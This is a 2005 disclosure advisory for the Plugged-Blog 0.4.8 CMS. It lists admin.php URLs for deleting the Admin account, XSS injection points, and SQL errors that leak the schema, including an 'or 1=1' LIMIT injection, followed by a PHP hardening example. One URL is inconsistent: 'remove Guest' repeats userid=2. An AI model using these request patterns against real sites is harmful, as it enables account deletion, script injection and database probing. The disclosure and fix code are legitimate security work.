###############################
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin

vendor url: http://www.pluggedout.com
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html
vendor notify: yes
exploit available: yes
###############################

Plugged-Blog is a CMS WebBlog-Portal content management system. The install is very easy to use and configure, it is fast, and it ships with a good Readme. It is a solution for webmasters and normal users alike.

######### versions #########
0.4.8

######### Solution #########
No solution at this time!

######### Timeline ########
Discovered: 29-07-2005
vendor notify: 29-07-2005
disclosure: 30-07-2005

####### Bad Definition ########
The following admin.php parameters are used without any validation of their value:
- Bad definition of variable userid=
- Bad definition of variable contentid=
- Bad definition of variable templateid=
- Bad definition of variable doctypeid=
- Bad definition of variable list_from=
- Bad definition of variable usertypeid=
- Bad definition of variable templateid=
- Bad definition of variable contenttypeid=

http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What is there to remove if that record does not exist? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What is there to remove if that record does not exist? :p

######## How to remove Admin ########
By default, the users Admin and Guest exist.
The userid of Admin is 2, and the userid of Guest is 1.
If you want to remove Admin, enter in the browser:
http://[victim]/admin.php?action=user_del&userid=2
If you want to remove Guest, enter in the browser:
http://[victim]/admin.php?action=user_del&userid=2
Observation: you must be logged in as the Admin user.

################## Proof of concepts ##################
In messages we can write XSS code and then see it on the WebBlog home page. If you write XSS code in a message, the following URLs render it:

####### XSS message #######
http://[victim]/admin.php?action=report_statistics&report=visitors
http://[victim]/admin.php?action=content_list
http://[victim]/admin.php?action=report_statistics&report=page_hits
Select the ID to visit (only if the message containing the XSS is displayed) and the XSS fires.

######### XSS #########
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]

######### Observation #########
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What is there to remove if that record does not exist? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What is there to remove if that record does not exist?
:p

########### SQL errors & SQL Injection ###########
If you write XSS code in the URL:
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]
or you change the value of contenttypeid=[change-the-valor], you get the error message:

Problem with SQL [SELECT nContentSecurityId, cms_ContentSecurity.nUserTypeId, cms_ContentSecurity.nContentTypeId, cUserTypeName, cView, cAdd, cEdit, cDelete, cApprove FROM cms_ContentSecurity INNER JOIN cms_UserType ON cms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId WHERE nContentTypeId= ORDER BY cUserTypeName]

and, for the table message:

Problem with SQL [SELECT * FROM cms_ContentTypeProperties WHERE nContentTypeId= ORDER BY nSortIndex]

Both errors reveal the table and field names.

If you write XSS code in the URL above, you get the error message:
Could not find record [SELECT * FROM cms_Content WHERE nContentId=;]
which gives you the name of the table and of the affected field.

http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]
produces this error:
SELECT COUNT(nStatisticId) AS nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress FROM cms_Statistics GROUP BY cSessionId, cIPAddress ORDER BY dLastView DESC LIMIT or 1=1,20

######################## End ##########################
Thanks to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
--
Sincerely: FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
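Every finding above has the same root cause: admin.php puts raw query-string values straight into SQL text and back into HTML, and prints the failing statement when the query breaks. The following is an added example of how such a handler can be hardened; it is not Plugged-Blog's code. It assumes a mysqli connection in $db, uses the cms_Content and cms_Statistics tables and columns taken from the leaked error messages above, and the function names (require_int_param, load_content, visitor_stats, h, delete_content) and the cTitle column are hypothetical.

```php
<?php
// Added example, not Plugged-Blog code. Assumes a mysqli connection in $db and
// the cms_Content / cms_Statistics tables and columns named in the leaked error
// messages above; function names and the cTitle column are hypothetical.
declare(strict_types=1);

// Throw on SQL errors instead of printing the statement to the browser.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// 1. Every numeric id (userid, contentid, contenttypeid, templateid, list_from, ...)
//    is validated as an integer before it reaches a query. A missing or non-numeric
//    value gets a 400 instead of producing "WHERE nContentId=;" and a leaked query.
function require_int_param(array $params, string $name, int $min = 1): int
{
    $value = filter_var($params[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min]]);
    if ($value === false) {
        http_response_code(400);
        exit('Invalid request');
    }
    return $value;
}

// 2. The id is bound as a parameter, so the SQL text never contains user input.
function load_content(mysqli $db, int $contentId): ?array
{
    $stmt = $db->prepare('SELECT * FROM cms_Content WHERE nContentId = ?');
    $stmt->bind_param('i', $contentId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// 3. The paging offset for report_statistics is bound too; a value such as
//    "or 1=1" never reaches the LIMIT clause because step 1 already rejected it.
function visitor_stats(mysqli $db, int $from, int $pageSize = 20): array
{
    $stmt = $db->prepare(
        'SELECT COUNT(nStatisticId) AS nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress'
        . ' FROM cms_Statistics GROUP BY cSessionId, cIPAddress'
        . ' ORDER BY dLastView DESC LIMIT ?, ?');
    $stmt->bind_param('ii', $from, $pageSize);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// 4. Anything echoed back into HTML (the "s" search string, stored message text)
//    is escaped, so an injected <script> tag is rendered as text, not executed.
function h(?string $text): string
{
    return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 5. Destructive actions only run on a POST carrying the session's CSRF token,
//    so a logged-in admin cannot be made to delete a record just by following a link.
function delete_content(mysqli $db, array $post, string $sessionToken): bool
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST'
        || !hash_equals($sessionToken, (string) ($post['csrf'] ?? ''))) {
        http_response_code(403);
        exit('Forbidden');
    }
    $contentId = require_int_param($post, 'contentid');
    $stmt = $db->prepare('DELETE FROM cms_Content WHERE nContentId = ?');
    $stmt->bind_param('i', $contentId);
    $stmt->execute();
    $deleted = $stmt->affected_rows === 1;   // false when the record does not exist
    $stmt->close();
    return $deleted;
}

// Dispatcher sketch: SQL failures are logged server-side and the browser only
// sees a generic message, never the statement text.
try {
    $action = $_GET['action'] ?? '';
    if ($action === 'content_edit') {
        $row = load_content($db, require_int_param($_GET, 'contentid'));
        if ($row === null) {
            http_response_code(404);
            exit('Not found');
        }
        echo '<h1>' . h($row['cTitle'] ?? '') . '</h1>';   // cTitle is assumed
    } elseif ($action === 'report_statistics') {
        $from = require_int_param($_GET, 'list_from', 0);
        foreach (visitor_stats($db, $from) as $r) {
            echo h($r['cIPAddress']) . ' ' . h((string) $r['nCount']) . "<br>\n";
        }
        echo '<p>Search: ' . h($_GET['s'] ?? '') . '</p>';
    }
} catch (mysqli_sql_exception $e) {
    error_log('admin.php: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
```

The three layers map directly onto the advisory: integer validation and bound parameters remove both the table-revealing errors and the LIMIT injection, output escaping removes the reflected and stored XSS, and requiring a POST with a CSRF token means a delete such as user_del&userid=2 can no longer be triggered by a plain GET link while an administrator is logged in.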